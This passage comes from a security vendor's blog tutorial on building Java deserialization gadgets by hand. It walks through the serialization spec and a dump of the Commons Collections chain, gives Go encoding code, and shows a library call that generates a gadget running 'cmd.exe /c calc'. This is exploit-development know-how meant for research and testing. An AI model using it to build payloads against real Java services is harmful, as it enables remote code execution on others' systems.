If it still doesn’t make sense, don’t worry — it should get easier as we see more of them.",[993,13505,13507],{"id":13506},"continuing-on","Continuing On",[18,13509,13510,13511,13513,13514,13517,13518,13521,13522,13524,13525,13528],{},"So looking back at the ",[886,13512,13374],{},", first we see the constant, denoting which record is coming up; in this case it is “",[886,13515,13516],{},"TC_OBJECT","”, which is represented as ",[886,13519,13520],{},"0x73",". We know from the spec that ",[886,13523,13516],{}," is used by the ",[886,13526,13527],{},"newObject,"," for which the spec is:",[1354,13530,13533],{"className":13531,"code":13532,"language":1359,"meta":219},[1357],"newObject:\n  TC_OBJECT classDesc newHandle classdata[]  \u002F\u002F data for each class\n",[886,13534,13532],{"__ignoreMap":219},[18,13536,13537,13538,13541,13542,13544,13545,1246,13548,13551,13552,13555],{},"From this we can tell that ",[886,13539,13540],{},"newObject"," is made up of the ",[886,13543,13516],{}," code, followed by a ",[886,13546,13547],{},"classDesc",[886,13549,13550],{},"newHandle",", and a sequence of ",[886,13553,13554],{},"classdata","s.",[18,13557,13558,13559,13561],{},"So first we need to define the ",[886,13560,13547],{},", which as the name suggests, describes a class. 
Looking at the spec below, you can get an idea of what is expected in this record:",[1354,13563,13566],{"className":13564,"code":13565,"language":1359,"meta":219},[1357],"classDesc:\n  newClassDesc\n  nullReference\n  (ClassDesc)prevObject      \u002F\u002F an object required to be of type ClassDesc\n\nnewClassDesc:\n  TC_CLASSDESC className serialVersionUID newHandle classDescInfo\n  TC_PROXYCLASSDESC newHandle proxyClassDescInfo\n\nnullReference\n  TC_NULL\n",[886,13567,13565],{"__ignoreMap":219},[18,13569,13570,13571,13573,13574,13577,13578,13581],{},"So looking at the dump we know that we will be making the ",[886,13572,13547],{}," using ",[886,13575,13576],{},"newClassDesc"," because we see the ",[886,13579,13580],{},"TC_CLASSDESC"," type code being used.",[18,13583,13584,13585,13587,13588,13591],{},"So the first item after the type code (",[886,13586,13580],{},") we see we need the ",[886,13589,13590],{},"className"," which, not too dissimilar from .NET, is a string, prefixed by its length. Though instead of using a 7-bit length encoding like in .NET, this protocol just wants a two byte, Big-endian number representing the length of the string.",[18,13593,13594,13595,13598,13599,13602,13603,13605],{},"In this case, we know the class name is ",[886,13596,13597],{},"java.util.HashSet",", which is 17 characters long, so we end up with ",[886,13600,13601],{},"0x0011"," immediately followed by the string “",[886,13604,13597],{},"”.",[18,13607,13608,13609,13611,13612,13615,13616,59],{},"Next down the ",[886,13610,13576],{}," list is the ",[886,13613,13614],{},"serialVersionUID",", which exists to determine if a version of a class and a serialized stream object match. This way, whatever is parsing the stream will know whether or not it should attempt to deserialize the provided stream into its version of the class. 
For our purposes, just copy what you see, and in this case it is ",[886,13617,13618],{},"0xBA44859596B8B734",[18,13620,13621,13622,13624],{},"Then we see ",[886,13623,13550],{},", aka Handler in zkar, which is described in the specs as:",[1354,13626,13629],{"className":13627,"code":13628,"language":1359,"meta":219},[1357],"newHandle:       \u002F\u002F The next number in sequence is assigned\n                 \u002F\u002F to the object being serialized or deserialized\n",[886,13630,13628],{"__ignoreMap":219},[18,13632,13633,13634,13638,13639,13642,13643,13646,13647,13650],{},"This is quite similar to the ObjectID in the .NET spec but represented in a different way. First of all, you do not need to actually include this value in the stream; it is a value that starts at 8257536 and iterates every time a record type is introduced that has ",[1131,13635,13636],{},[886,13637,13550],{}," in the specs. To clarify, you do not need to write the handles into the stream, whatever is parsing them is expected to keep track of how many objects it has parsed at any given point. While you do not explicitly write the handle into the stream yourself, you ",[1131,13640,13641],{},"will"," use them as values when creating ",[886,13644,13645],{},"TC_REFERENCE"," records, which is basically identical to .NET’s ",[886,13648,13649],{},"MemberReference",". 
We won’t go too far into these right now but at least know what handles are for and why they show up in the zkar dump.",[18,13652,13653],{},"Let’s look at the next few lines of the zkar dump (lines 11-18):",[1354,13655,13658],{"className":13656,"code":13657,"language":1359,"meta":219},[1357],"@ClassDescFlags - SC_SERIALIZABLE|SC_WRITE_METHOD - 0x03\n@FieldCount - 0 - 0x00 00\n[]Fields\n[]ClassAnnotations\nTC_ENDBLOCKDATA - 0x78\n@SuperClassDesc\nTC_NULL - 0x70\n@Handler - 8257537\n",[886,13659,13657],{"__ignoreMap":219},[18,13661,13662,13663,13665,13666,13669],{},"The next part here starts the final piece of ",[886,13664,13576],{},", the ",[886,13667,13668],{},"classDescInfo",", which from the protocol spec is made up of four other items:",[1354,13671,13674],{"className":13672,"code":13673,"language":1359,"meta":219},[1357],"classDescInfo:\n  classDescFlags fields classAnnotation superClassDesc\n",[886,13675,13673],{"__ignoreMap":219},[18,13677,13678,13681,13682,13685,13686,13689],{},[886,13679,13680],{},"classDescFlags"," is a single-byte bitwise flag. Going by the zkar output, we know this is going to be ",[886,13683,13684],{},"0x03",". There is more information about this in the spec’s ",[886,13687,13688],{},"classdata:"," section but for building out gadgets, we can just copy this byte and move on.",[18,13691,13692,13693,4606],{},"The next item is ",[886,13694,13695],{},"fields",[1354,13697,13700],{"className":13698,"code":13699,"language":1359,"meta":219},[1357],"fields:\n  (short)\u003Ccount>  fieldDesc[count]\n",[886,13701,13699],{"__ignoreMap":219},[18,13703,13704,13705,59],{},"This one starts with a two-byte value that specifies the number of fields. 
This class apparently has no fields — therefore, the count is 0, which as a short is ",[886,13706,13707],{},"0x0000",[18,13709,13710,13711,13714,13715,13718,13719,13721,13722,59],{},"Following that is ",[886,13712,13713],{},"classAnnotation",", which according to spec is ",[886,13716,13717],{},"endBlockData"," which optionally can be preceded by ",[886,13720,13370],{},"; though from what I have seen so far, it is most often just ",[886,13723,13717],{},[1354,13725,13728],{"className":13726,"code":13727,"language":1359,"meta":219},[1357],"classAnnotation:\n  endBlockData\n  contents endBlockData      \u002F\u002F contents written by annotateClass\n",[886,13729,13727],{"__ignoreMap":219},[18,13731,13732,13733,13736,13737,13740,13741,13740,13744,13747,13748,13751],{},"Next we have the ",[886,13734,13735],{},"superClassDesc",", which can be yet another ",[886,13738,13739],{},"newClassDesc&#x60;, or alternatively *","nullReference",[886,13742,13743],{},"*, which is more commonly the case. Going by the dump here, we will use",[886,13745,13746],{},"which is just a","TC_NULL",[886,13749,13750],{},"code byte, represented as","0x70`.",[18,13753,13754,13755,13757],{},"That finishes off the first part of the ",[886,13756,13516],{},", so now let’s see what it would look like if we did this in Golang:",[1354,13759,13762],{"className":13760,"code":13761,"language":1359,"meta":219},[1357],"\u002F\u002F 'terminal codes'\nconst TCNullCode = \"\\x70\"\nconst TCReferenceCode = \"\\x71\"\nconst TCClassDescCode = \"\\x72\"\n... 
\u002F\u002F cut for brevity\n\ntype TCContent interface {\n\u002F\u002F we know we want everything to end up as a stream of bytes, so it makes sense\n\u002F\u002F to have an interface for this to use across various \"record\" types.\n    ToBytes() (string, bool) \n}\n\ntype Field interface {\n\u002F\u002F Fields can be many different types, so it is best to implement an interface\n\u002F\u002F for these, there will be more on fields later.\n    ToFieldBin() (string, bool)\n}\n\ntype TCClassDesc struct {\n    Name            string \u002F\u002F will be lenPrefixedString'd\n    SerialVersionUID string \u002F\u002F 8 bytes\n    Flags           string \u002F\u002F optional, if omitted will default to SCSerializableCode\n    Fields          []Field\n    SuperClassDesc   TCContent\n}\n\ntype TCObject struct {\n    ClassDesc TCClassDesc \u002F\u002F will contain the part we just did \n    ClassData []TCContent\n}\n\nfunc (tcClassDesc *TCClassDesc) getFieldsBin() (string, bool) {\n    binary := transform.PackBigInt16(len(tcClassDesc.Fields))\n    for _, field := range tcClassDesc.Fields {\n        bin, ok := field.ToFieldBin()\n        if !ok {\n            output.PrintfFrameworkError(\"Failed to get bin for field %q\", field)\n            return \"\", false\n        }\n        binary += bin\n    }\n    return binary, true\n}\n\nfunc (tcClassDesc TCClassDesc) ToBytes() (string, bool) {\n    fieldsBinString, _ := tcClassDesc.getFieldsBin()\n    if tcClassDesc.Flags == \"\" {\n            tcClassDesc.Flags = SCSerializableCode\n    }\n\n    binary := TCClassDescCode +\n        lenPrefixedString(tcClassDesc.Name) +\n        tcClassDesc.SerialVersionUID +\n        tcClassDesc.Flags +\n        fieldsBinString\n\n    \u002F\u002F TODO support actual annotations\n    binary += TCEndBlockDataCode\n\n    if tcClassDesc.SuperClassDesc == nil {\n            binary += TCNullCode\n    } else {\n            superClassString, ok := tcClassDesc.SuperClassDesc.ToBytes()\n            if 
!ok {\n                    return \"\", false\n        }\n            binary += superClassString\n    }\n    return binary, true\n}\n\n\u002F\u002F actual usage \nTCObject {\n        ClassDesc: TCClassDesc {\n            Name:           \"java.util.HashSet\",\n            SerialVersionUID: \"\\xba\\x44\\x85\\x95\\x96\\xb8\\xb7\\x34\",\n            Flags:          \"\\x03\",\n            Fields:         []Field{},\n        },\n}\n",[886,13763,13761],{"__ignoreMap":219},[18,13765,13766,13767,13770,13771,13775],{},"Obviously there are some pieces I left out for brevity, such as the helper function, ",[886,13768,13769],{},"lenPrefixedString()",", and some methods, but all of those can be found ",[47,13772,13774],{"href":13287,"rel":13773},[51],"on the library github",". This provides a basic outline of what we are going for, though.",[61,13777,13778],{"id":13554},"ClassData",[18,13780,13781,13782,13784,13785,13788],{},"To complete the ",[886,13783,13540],{}," that we started in the last section, we still need the ",[886,13786,13787],{},"classdata[]"," portion that supplies the data for the class that was defined.",[1354,13790,13793],{"className":13791,"code":13792,"language":1359,"meta":219},[1357],"newObject:\n  TC_OBJECT classDesc newHandle classdata[]  \u002F\u002F data for each class\n\nclassdata:\n  nowrclass                 \u002F\u002F SC_SERIALIZABLE & classDescFlag &&\n                            \u002F\u002F !(SC_WRITE_METHOD & classDescFlags)\n  wrclass objectAnnotation  \u002F\u002F SC_SERIALIZABLE & classDescFlag &&\n                            \u002F\u002F SC_WRITE_METHOD & classDescFlags\n  externalContents          \u002F\u002F SC_EXTERNALIZABLE & classDescFlag &&\n                            \u002F\u002F !(SC_BLOCKDATA  & classDescFlags\n  objectAnnotation          \u002F\u002F SC_EXTERNALIZABLE & classDescFlag&& \n                            \u002F\u002F SC_BLOCKDATA & 
classDescFlags\n",[886,13794,13792],{"__ignoreMap":219},[18,13796,13797,13798,13801,13802,59],{},"Looking at the dump, the next record that gets defined is the ",[886,13799,13800],{},"objectAnnotation",", which ends up being ",[886,13803,13377],{},[1354,13805,13808],{"className":13806,"code":13807,"language":1359,"meta":219},[1357],"blockdatashort:\n  TC_BLOCKDATA (unsigned byte)\u003Csize> (byte)[size]\n",[886,13809,13807],{"__ignoreMap":219},[18,13811,13812,13813,13816,13817,13820],{},"This will be the ",[886,13814,13815],{},"TC_BLOCKDATA"," record byte (",[886,13818,13819],{},"0x77","); then a single byte denoting the size of bytes for the data; and then finally, the data itself.",[18,13822,13823,13826,13827,13829],{},[295,13824,13825],{},"Note:"," This size value is NOT present in the zkar dump at the time of this writing, which is likely an oversight; I am just mentioning this here to prevent confusion, as it ",[1131,13828,4563],{}," need to be included in the stream.",[18,13831,13832,13833,4606],{},"Another example of how to “code-ify” one of these records — something like this will work for ",[886,13834,13815],{},[1354,13836,13839],{"className":13837,"code":13838,"language":1359,"meta":219},[1357],"type TCBlockData struct {\n    Data []byte\n}\n\nfunc (tcBlockData TCBlockData) ToBytes() ([]byte, bool) {\n    if len(tcBlockData.Data) > 0xff {\n        output.PrintError(\"Provided data buffer is too large for this record type, use BLOCKDATALONG instead\")\nreturn []byte{}, false\n    }\n    buf := []byte{byte(len(tcBlockData.Data))}\n    return append(buf, tcBlockData.Data...), true\n}\n",[886,13840,13838],{"__ignoreMap":219},[18,13842,13360,13843,13845,13846,13848],{},[886,13844,13815],{},", we have what looks like another ",[886,13847,13540],{}," record, nested inside of the first one. 
This sort of thing is what lends these gadgets their verbosity; a great deal of nesting is common in these gadgets, which makes understanding them difficult.",[18,13850,13851],{},"This next object is similar to the previous one, but now we have fields, so let’s see how those manifest in the object stream. Here I will make the notation a little shorter and more readable since we have gone over this record type before.",[18,13853,13854,13855,13858,13859,13862,13863,13866,13867,13870,13871],{},"ClassName: ",[886,13856,13857],{},"0x0034"," + ",[886,13860,13861],{},"org.apache.commons.collections.keyvalue.TiedMapEntry",":br\nSerialVersionUID: ",[886,13864,13865],{},"0x8AADD29B39C11FDB",":br\nClassDescFlags: ",[886,13868,13869],{},"0x02",":br\nFieldCount: ",[886,13872,13873],{},"0x0002",[18,13875,13876],{},"Here is the spec for fields:",[1354,13878,13881],{"className":13879,"code":13880,"language":1359,"meta":219},[1357],"fields:\n  (short)\u003Ccount>  fieldDesc[count]\n\nfieldDesc:\n  primitiveDesc\n  objectDesc\n\nprimitiveDesc:\n  prim_typecode fieldName\n\nobjectDesc:\n  obj_typecode fieldName className1\n\nfieldName:\n  (utf)\n\nclassName1:\n  (String)object             \u002F\u002F String containing the field's type,\n                             \u002F\u002F in field descriptor format\nprim_typecode:\n  `B'       \u002F\u002F byte\n  `C'       \u002F\u002F char\n  `D'       \u002F\u002F double\n  `F'       \u002F\u002F float\n  `I'       \u002F\u002F integer\n  `J'       \u002F\u002F long\n  `S'       \u002F\u002F short\n  `Z'       \u002F\u002F boolean\n\nobj_typecode:\n  `[`   \u002F\u002F array\n  `L'   \u002F\u002F object\n",[886,13882,13880],{"__ignoreMap":219},[18,13884,13885,13886,13889,13890,13893,13894,13897,13898,59],{},"So we have already seen the first part of the `fields` section, it is a short (two bytes) that represents the number of fields. But in our previous example there were no fields. 
However, if fields ",[1131,13887,13888],{},"do"," exist for the class, like in this one, then they must follow the ",[886,13891,13892],{},"fieldDesc"," spec, which can be one of two types: a ",[886,13895,13896],{},"primitiveDesc"," or an ",[886,13899,13900],{},"objectDesc",[18,13902,13903],{},"The dump for the Fields section of TiedMapEntry is here:",[1354,13905,13908],{"className":13906,"code":13907,"language":1359,"meta":219},[1357],"@FieldCount - 2 - 0x00 02\n[]Fields\n  Index 0:\n    Object - L - 0x4c\n    @FieldName\n    @Length - 3 - 0x00 03\n    @Value - key - 0x6b 65 79\n    @ClassName\n    TC_STRING - 0x74\n        @Handler - 8257539\n        @Length - 18 - 0x00 12\n        @Value - Ljava\u002Flang\u002FObject; - 0x4c 6a 61 76 61 2f 6c 61 6e 67 2f 4f 62 6a 65 63 74 3b\n  Index 1:\n    Object - L - 0x4c\n    @FieldName\n    @Length - 3 - 0x00 03\n    @Value - map - 0x6d 61 70\n    @ClassName\n    TC_STRING - 0x74\n        @Handler - 8257540\n        @Length - 15 - 0x00 0f\n        @Value - Ljava\u002Futil\u002FMap; - 0x4c 6a 61 76 61 2f 75 74 69 6c 2f 4d 61 70 3b\n",[886,13909,13907],{"__ignoreMap":219},[18,13911,13912,13913,13915,13916,13919,13920,13922],{},"Here we are expecting to define two fields, both of which will be ",[886,13914,13900],{},". This is denoted by the ",[886,13917,13918],{},"L"," value that prefaces both defined fields. 
With the ",[886,13921,13900],{},", we know we need to define the fieldName, followed by the className so let’s define the two fields.",[18,13924,13925,13926,13928,13929,13931,13932,13934,13935,13938,13939,13941,13942,13945,13946,13934,13949,13952],{},"Field1: ",[1823,13927],{},"\nfieldName: ",[886,13930,13918],{}," (object typecode) + ",[886,13933,13684],{}," (length of value) + ",[886,13936,13937],{},"key"," (value) ",[1823,13940],{},"\nclassName: ",[886,13943,13944],{},"0x74"," (states that this is a string) + ",[886,13947,13948],{},"0x0012",[886,13950,13951],{},"Ljava\u002Flang\u002FObject;"," (value)",[18,13954,13955,13956,13928,13958,13931,13960,13934,13962,13938,13965,13941,13967,13945,13969,13934,13972,13952],{},"Field2: ",[1823,13957],{},[886,13959,13918],{},[886,13961,13684],{},[886,13963,13964],{},"map",[1823,13966],{},[886,13968,13944],{},[886,13970,13971],{},"0x000f",[886,13973,13974],{},"Ljava\u002Futil\u002FMap;",[18,13976,13977,13978,13980],{},"Following this, you would move onto ",[886,13979,13713],{}," and so on just like the previous object.",[993,13982,13984],{"id":13983},"primitive-fields","Primitive Fields",[18,13986,13987,13988,13990,13991,13993],{},"But what if a field value were a ",[886,13989,13896],{}," instead of an ",[886,13992,13900],{},"?",[1354,13995,13998],{"className":13996,"code":13997,"language":1359,"meta":219},[1357],"primitiveDesc:\n  prim_typecode fieldName\n\nprim_typecode:\n  `B'       \u002F\u002F byte\n  `C'       \u002F\u002F char\n  `D'       \u002F\u002F double\n  `F'       \u002F\u002F float\n  `I'       \u002F\u002F integer\n  `J'       \u002F\u002F long\n  `S'       \u002F\u002F short\n  `Z'       \u002F\u002F boolean\n\nobj_typecode:\n  `[`   \u002F\u002F array\n  `L'       \u002F\u002F object\n",[886,13999,13997],{"__ignoreMap":219},[18,14001,14002],{},"At this point I am going to break away from the object we were defining before and use some other portions of the dump as examples. 
Remember that we cannot build the entire gadget in this blog as it is simply too large. Instead the goal is to explain how to read and understand the spec while explaining the trickier parts and offering some examples of how to “codify” some parts of the spec.",[18,14004,14005,14006,14008,14009,13555],{},"That said, if we go further down in the dump, we see a record whose ",[886,14007,13580],{}," includes two fields, both of which are ",[886,14010,13896],{},[1354,14012,14015],{"className":14013,"code":14014,"language":1359,"meta":219},[1357],"...\n@FieldCount - 2 - 0x00 02\n[]Fields\n  Index 0:\n    Float - F - 0x46\n    @FieldName\n    @Length - 10 - 0x00 0a\n    @Value - loadFactor - 0x6c 6f 61 64 46 61 63 74 6f 72\n  Index 1:\n    Integer - I - 0x49\n    @FieldName\n    @Length - 9 - 0x00 09\n    @Value - threshold - 0x74 68 72 65 73 68 6f 6c 64\n...\n",[886,14016,14014],{"__ignoreMap":219},[18,14018,14019,14020,14023,14024,14027,14028,14031],{},"So starting from just after the ",[886,14021,14022],{},"fieldCount",", we can see the first field being prefaced with an ",[886,14025,14026],{},"F",". We know from the spec referenced above that it is the ",[886,14029,14030],{},"prim_typecode"," that denotes a float.",[18,14033,14034,14035,14038,14039,14041,14042,14045,14046,14048],{},"Now with fields, remember we are just defining the “metadata” for them, such as the name and type, not the actual values (yet). So here we are saying this is a float, called ",[886,14036,14037],{},"loadFactor",". This is represented as yet another length-prefixed string, so the entire first field above is just ",[886,14040,14026],{}," (prim_typecode), ",[886,14043,14044],{},"0x000a"," (value length), and ",[886,14047,14037],{}," (value).",[18,14050,14051,14052,14054,14057,14058,14061,14062,14048],{},"The same idea is followed for the second field. 
",[1823,14053],{},[886,14055,14056],{},"I"," (primitive typecode for Integer) + ",[886,14059,14060],{},"0x0009"," (value length) + ",[886,14063,14064],{},"threshold",[18,14066,14067,14068,14071],{},"That’s pretty much it for primitive fields. If you want to see where the actual numerical values are located for these, just look a little further in the dump at the ",[886,14069,14070],{},"classData"," section:",[1354,14073,14076],{"className":14074,"code":14075,"language":1359,"meta":219},[1357],"...\n[]ClassData\n  @ClassName - java.util.HashMap\n    {}Attributes\n    loadFactor\n        (float)0.75 - 0x3f 40 00 00\n    threshold\n        (integer)0 - 0x00 00 00 00\n...\n",[886,14077,14075],{"__ignoreMap":219},[18,14079,14080,14081,14083,14084,14087,14088,14090,14091,14094,14095,14098,14099,14102],{},"In the ",[886,14082,14070],{},", under attributes, you can see the actual data for the primitive values whose positions correspond to the position of their respective “keys” in the ",[886,14085,14086],{},"Fields"," section. The ",[886,14089,14037],{}," (float) is ",[886,14092,14093],{},"0.75,","represented in hexadecimal as ",[886,14096,14097],{},"0x3f400000",", and the integer is a four-byte hexadecimal ",[886,14100,14101],{},"0x00000000"," which is obviously just zero.",[993,14104,14106],{"id":14105},"array-fields","Array Fields",[18,14108,14109,14110,14112,14113,14115,14116,14118,14119,59],{},"Another field type that is a little bit different is the array field. 
For the field section, it operates the same as all of the ",[886,14111,13900],{}," fields: some sort of ",[886,14114,14030],{},", in this case a single opening bracket ",[886,14117,7035],{}," representing an array, followed by a FieldName and a ClassName, both of which are len-prefixed string values with the ClassName being a separate record with its own constant, ",[886,14120,13944],{},[18,14122,14123,14124,4606],{},"Just to show an example of this using the zkar dump, here is the Fields section for ",[886,14125,14126],{},"ChainedTransformer",[1354,14128,14131],{"className":14129,"code":14130,"language":1359,"meta":219},[1357],"@FieldCount - 1 - 0x00 01\n[]Fields\n  Index 0:\n    Array - [ - 0x5b\n    @FieldName\n    @Length - 13 - 0x00 0d\n    @Value - iTransformers - 0x69 54 72 61 6e 73 66 6f 72 6d 65 72 73\n    @ClassName\n    TC_STRING - 0x74\n        @Handler - 8257547\n        @Length - 45 - 0x00 2d\n        @Value - [Lorg\u002Fapache\u002Fcommons\u002Fcollections\u002FTransformer; - 0x5b 4c 6f 72 67 2f 61 70 61 63 68 65 2f 63 6f 6d 6d 6f 6e 73 2f 63 6f 6c 6c 65 63 74 69 6f 6e 73 2f 54 72 61 6e 73 66 6f 72 6d 65 72 3b\n",[886,14132,14130],{"__ignoreMap":219},[18,14134,14135,14136,14139],{},"The array values, as with other fields, can be found by looking at the defining class’s ",[886,14137,14138],{},"[]ClassData"," attribute that corresponds to the field’s position.",[18,14141,14142,14143,4606],{},"The spec for arrays is listed in the spec as ",[886,14144,14145],{},"newArray",[1354,14147,14150],{"className":14148,"code":14149,"language":1359,"meta":219},[1357],"newArray:\n  TC_ARRAY classDesc newHandle (int)\u003Csize> values[size]\n",[886,14151,14149],{"__ignoreMap":219},[18,14153,14154,14155,14157,14158,14161],{},"This will be a single byte, then the ",[886,14156,13547],{}," —the handle is implied, so it does not need to be added by us — then a four-byte integer representing the number of values in the array, finally followed by the array values 
themselves. We saw the Fields section for ",[886,14159,14160],{},"ChainedTransformer,"," so now let’s look at the actual array object to which the field referred below. Some information has been omitted for brevity and clarity.",[1354,14163,14166],{"className":14164,"code":14165,"language":1359,"meta":219},[1357],",..\n[]ClassData\n  @ClassName - org.apache.commons.collections.functors.ChainedTransformer\n    {}Attributes\n      iTransformers\n        TC_ARRAY - 0x75\n          TC_CLASSDESC - 0x72\n            @ClassName\n              @Length - 45 - 0x00 2d\n              @Value - [Lorg.apache.commons.collections.Transformer; - 0x5b 4c 6f 72 67 2e 61 70 61 63 68 65 2e 63 6f 6d 6d 6f 6e 73 2e 63 6f 6c 6c 65 63 74 69 6f 6e 73 2e 54 72 61 6e 73 66 6f 72 6d 65 72 3b\n            @SerialVersionUID - -4803604734341277543 - 0xbd 56 2a f1 d8 34 18 99\n            @Handler - 8257549\n            @ClassDescFlags - SC_SERIALIZABLE - 0x02\n            @FieldCount - 0 - 0x00 00\n            []Fields\n            []ClassAnnotations\n              TC_ENDBLOCKDATA - 0x78\n            @SuperClassDesc\n              TC_NULL - 0x70\n          @Handler - 8257550\n           @ArraySize - 5 - 0x00 00 00 05\n           []Values\n            Index 0\n              TC_OBJECT - 0x73\n                 TC_CLASSDESC - 0x72\n                --- OMITTED FOR BREVITY ---\n                 @Handler - 8257552\n                 []ClassData\n                   @ClassName - org.apache.commons.collections.functors.ConstantTransformer\n                     {}Attributes\n                     iConstant\n                       TC_CLASS - 0x76\n                         TC_CLASSDESC - 0x72\n                            --- OMITTED FOR BREVITY ---\n                         @Handler - 8257554\n            Index 1\n              ...\n",[886,14167,14165],{"__ignoreMap":219},[18,14169,14170,14171,13555],{},"We will only briefly go over the first item in the array mentioned in the field since this particular array 
is quite large; all five items are ",[886,14172,13516],{},[18,14174,14175,14176,14179,14180,14183,14184,14186],{},"From the top the ",[886,14177,14178],{},"TC_ARRAY","-identifying byte can be seen, represented as ",[886,14181,14182],{},"0x75",". Next, per the specification, is the ",[886,14185,13580],{},", which we have already gone over earlier in this blog.",[18,14188,14189,14190,14193,14194,14196,14197,14199,14200,14202],{},"Following the class description is the size of the array, represented here as ",[886,14191,14192],{},"0x00000005",". ",[1823,14195],{},"\nAfter this are the values. In the dump above, the first item is shown, which is yet another ",[886,14198,13516],{}," (more nesting!). You can view the full zkar dump for the complete list of array items but this shows the structure of how the array field is laid out. Keep in mind that any of these ",[886,14201,13516],{},"s may contain fields with arrays that yet contain more arrays that contain more objects, and so on.",[993,14204,14206],{"id":14205},"tc_reference-records","TC_REFERENCE Records",[18,14208,14209,14210,14212,14213,4606],{},"The last record we will cover is the ",[886,14211,13645],{},". 
In the spec it is called ",[886,14214,14215],{},"prevObject",[1354,14217,14220],{"className":14218,"code":14219,"language":1359,"meta":219},[1357],"prevObject\n  TC_REFERENCE (int)handle\n",[886,14221,14219],{"__ignoreMap":219},[18,14223,14224,14225,14227],{},"The name ",[886,14226,14215],{}," makes sense, because as stated earlier in this blog post, it serves to reference another record that has been previously defined in the stream rather than redefining the entire record all over again (which would waste space).",[18,14229,14230],{},"Let’s look at quick example using an excerpt from the dump:",[1354,14232,14235],{"className":14233,"code":14234,"language":1359,"meta":219},[1357],"[]Fields\n  Index 0:\n    Object - L - 0x4c\n      @FieldName\n        @Length - 9 - 0x00 09\n        @Value - iConstant - 0x69 43 6f 6e 73 74 61 6e 74\n    @ClassName\n      TC_REFERENCE - 0x71\n            @Handler - 8257539 - 0x00 7e 00 03\n",[886,14236,14234],{"__ignoreMap":219},[18,14238,14239,14240,14243],{},"This is referencing another ",[886,14241,14242],{},"TC_STRING"," that was defined earlier in the stream:",[1354,14245,14248],{"className":14246,"code":14247,"language":1359,"meta":219},[1357],"[]Fields\n  Index 0:\n    Object - L - 0x4c\n    @FieldName\n      @Length - 3 - 0x00 03\n      @Value - key - 0x6b 65 79\n    @ClassName\n      TC_STRING - 0x74\n        @Handler - 8257539\n        @Length - 18 - 0x00 12\n        @Value - Ljava\u002Flang\u002FObject; - 0x4c 6a 61 76 61 2f 6c 61 6e 67 2f 4f 62 6a 65 63 74 3b\n",[886,14249,14247],{"__ignoreMap":219},[18,14251,14252,14253,14255],{},"Defining the ",[886,14254,13645],{}," is pretty straightforward:",[18,14257,14258,14259,14262],{},"The code (",[886,14260,14261],{},"0x71",") + the four byte hexadecimal for the “handler” of the referenced object.",[18,14264,14265],{},"See, simple!",[993,14267,1903],{"id":1902},[18,14269,14270,14271,59],{},"That about sums up the major points of the specification. 
For a full breakdown of the gadget and the code we wrote to generate it see the ",[47,14272,14275],{"href":14273,"rel":14274},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fblob\u002Feba8be1bfcd93c203cf8efd00a60e9c086d261f1\u002Fjava\u002Fgadgets.go#L286",[51],"full golang package on our github",[61,14277,14279],{"id":14278},"using-the-library","Using The Library",[18,14281,14282],{},"Just like the .NET gadget library, we tried to make VulnCheck’s Java serialization library as easy as possible to use.",[18,14284,14285],{},"Generating a gadget in Go using the library works as follows:",[1354,14287,14290],{"className":14288,"code":14289,"language":1359,"meta":219},[1357],"import (\n  \"os\"\n\n  \"github.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fjava\"\n)\nfunc main() {\n  gadgetData, ok := java.CreateCommonsCollections6(\"cmd.exe\", \"\u002Fc calc\")\n  if !ok {\n    \u002F\u002F failure!\n  }\n  \u002F\u002F do something with gadgetData\n}\n",[886,14291,14289],{"__ignoreMap":219},[18,14293,14294,14295,59],{},"If you wish to contribute or report bugs for this platform please feel free to make a pull request or issue on the ",[47,14296,14299],{"href":14297,"rel":14298},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit",[51],"go-exploit GitHub project",[61,14301,202],{"id":201},[18,14303,14304,14305,10515,14311,1255,14316,14321,14322,1234,14325,1240,14328,1246,14331,1255,14334,1260],{},"The VulnCheck research team is always looking for new vulnerabilities and exploits to curate. 
For more research like this, read our blogs ",[1131,14306,14307],{},[47,14308,14310],{"href":13214,"rel":14309},[51],"Making Serialization Gadgets By Hand - .NET,",[1131,14312,14313],{},[47,14314,10339],{"href":10337,"rel":14315},[51],[1131,14317,14318],{},[47,14319,11601],{"href":11599,"rel":14320},[51]," Sign up for the VulnCheck community today to get free access to our ",[47,14323,1233],{"href":10806,"rel":14324},[51],[47,14326,1239],{"href":1237,"rel":14327},[51],[47,14329,1245],{"href":1243,"rel":14330},[51],[47,14332,1251],{"href":1249,"rel":14333},[51],[47,14335,216],{"href":1258,"rel":14336},[51],{"title":219,"searchDepth":220,"depth":220,"links":14338},[14339,14340,14343,14344,14349,14355,14356],{"id":13191,"depth":220,"text":13194},{"id":13205,"depth":220,"text":13208,"children":14341},[14342],{"id":13227,"depth":1266,"text":13230},{"id":13292,"depth":220,"text":13293},{"id":13306,"depth":220,"text":14345,"children":14346},"You can view the full library with all relevant records implemented in VulnCheck’s go-exploit framework here: Github Getting Started",[14347,14348],{"id":13356,"depth":1266,"text":13357},{"id":13506,"depth":1266,"text":13507},{"id":13554,"depth":220,"text":13778,"children":14350},[14351,14352,14353,14354],{"id":13983,"depth":1266,"text":13984},{"id":14105,"depth":1266,"text":14106},{"id":14205,"depth":1266,"text":14206},{"id":1902,"depth":1266,"text":1903},{"id":14278,"depth":220,"text":14279},{"id":201,"depth":220,"text":202},"2026-02-05","Learn how to start creating Java serialization gadgets yourself - or use VulnCheck's go-exploit library for Golang-based 
exploits!",{"slug":14360},"making-java-gadgets","\u002Fblog\u002Fmaking-java-gadgets",{"title":13180,"description":14358},"blog\u002Fmaking-java-gadgets",[1281,14365,14366],"serialization","development","Z9I1R1VBr6xd9cqmAsO0fC7kXtAyNligw85lVFauHJk",{"id":14369,"title":11601,"articles":14370,"authors":14413,"body":14415,"date":14375,"description":14765,"extension":234,"image":7,"link":7,"meta":14766,"navigation":237,"path":14768,"seo":14769,"series":7,"stem":14770,"subtype":7,"tags":14771,"__hash__":14772},"blog\u002Fblog\u002Fmetro4shell_eitw.md",[14371,14376,14380,14384,14388,14392,14395,14399,14402,14405,14409],{"title":14372,"source":14373,"link":14374,"date":14375},"Hackers exploit critical React Native Metro bug to breach dev systems","Bleeping Computer","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fhackers-exploit-critical-react-native-metro-bug-to-breach-dev-systems\u002F","2026-02-03",{"title":14377,"source":14378,"link":14379,"date":14375},"Malware & ThreatsCritical React Native Vulnerability Exploited in the 